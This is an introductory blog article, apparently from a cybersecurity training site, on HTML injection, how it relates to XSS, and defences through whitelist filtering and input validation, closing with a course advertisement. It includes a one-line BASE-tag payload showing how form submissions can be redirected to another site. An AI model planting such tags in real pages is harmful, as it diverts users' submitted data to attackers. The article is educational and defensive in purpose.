HTML injection is part of a larger family of injections that are used to push malicious code that an unprepared web application processes unsuspectingly to return critical information, that may be used to gain access to the server or database. The victim is almost always an application on the web, but can also be an offline one that is not injection safe.
Let’s dive in a little more.
Web pages are generally all about displaying information, and in some cases accepting the information to be able to customize what the user can see on the webpage or accept user information through a form. Accepting information from the user is usually done through forms. The forms contain fields like text boxes and options buttons to select a few options and input names or search phrases. When the form is submitted, this information is sent to the server where the server uses these keywords or names to do some backend processing.
Basically, it will run some code on the backend server with the information supplied and return information useful for the user. Here is the trick, an experienced hacker will employ to get the server to return unintended unprotected information from the server, including table structures, usernames and passwords, personally identifiable information of customers and more. Instead of regular search phrases, the hacker sends a sequence of letters that may blend well with the backend query to form a line of code more potent than the intended one, that when used by the backend server to search on the backend database, inadvertently executes what the hacker wanted the server to.Â
The code that the attacker injects is in many forms, with the most potent ones being used in XSS and SQL injection attacks. As you might have guessed there are many HTML injection attacks, including Code injection, CRLF injection, Cross-site Scripting (XSS), Email Header injection, Host Header injection, LDAP injection, OS Command Injection, XPath injection.
In this article we shall focus on one of the injection types that is closely related to Cross-site Scripting (XSS), called HTML injection.
In Cross-site Scripting, the attacker injects a random script, usually JavaScript into a website or web application through input text fields, which then gets executed on the victim’s browser. We will look at HTM injection now and then come back to how these two are related.
From any little experience you might have had with web pages, you might know that HTML code is not actual code per se, but is a sequence of tags, HTML tags to be specific, that instruct the browser how to render a page. Attackers make use of HTML injections to insert HTML tags to cause harm in many ways like changing visible content of a web page, creating an illegitimate form and getting information from the user using that form to extract anti-CSRF tokens. CSRF is Cross-Site Request Forgery. HTML injections are also known to be used for extracting stored passwords in a browser.
Let’s get to the similarities to Cross-site Scripting which is considered more potent.
In a Cross-site Scripting attack, the injected text is a scripting code that the browser supports, typically JavaScript. Cross-site Scripting, also known as XSS, is considered more potent due to the fact that the injected is code is not mere tags but code that may be executed to accomplish much more.
Some of the most used HTML injections are listed below.
Some HTML injections, evidently in some cases, use these to change the way the website displays content. For example, a visual advertisement that the attacker wants to promote can be injected into the webpage. It is seen that some attacks containing malicious HTML are aimed at harming the reputation of a webpage, mostly for political or personal reasons.
HTML injections may also be used for extracting sensitive personal information by redirecting the page to the attacker’s site, like in the example given.
A simple example is of an HTML tag called BASE. If the web application uses relative URLs for form submission, a certain base folder on the server is assumed in which the application folder is existing and running from. If we change this base folder with the help of the BASE tag, all form submissions will be redirected to this base site. A simple line like <base href=’https://example.com/’> will do.
Other ingenious ways that HTML injection is put to use are for the extraction of anti-CSRF tokens, extraction of usernames and passwords and more.
The only foolproof defence against HTML injections is the use of a whitelist-based filter approach, effectively weeding out any reference to HTML tags from the input text and to use your own base tags to override any that the attackers might have planted. It is a good practice to combine protection against HTML injections with protection against XSS, as in both cases, you are looking to weed out keywords that may alter the operation of your web application. This is called validation before the input is processed.
There is a caveat though. A simple validation will remove all such keywords and not allow legitimate user inputs like URLs if there is a need to. So, the application must use validation in the context of the type of input.
It is important that you secure your application in case it involves input from the user in any form. There are tools that help you with this kind of defence against HTML injection attacks. You might want to have a look at the benefits they offer before deciding on the best one for your setup.
So, have you made up your mind to make a career in Cyber Security? Visit our Master Certificate in Cyber Security (Red Team) for further help. It is the first program in offensive technologies in India and allows learners to practice in a real-time simulated ecosystem, that will give them an edge in this competitive world.
Fill in the details to know more
What Is Asset Classification?
March 20, 2023
Masquerade Attack – Everything You Need To Know!
February 27, 2023
Best Infosys Information Security Engineer Interview Questions and Answers
What Are SOC and NOC In Cyber Security? What’s the Difference?
A Brief Introduction to Cyber Security Analytics
February 26, 2023
Cyber Safe Behaviour In Banking Systems
February 17, 2023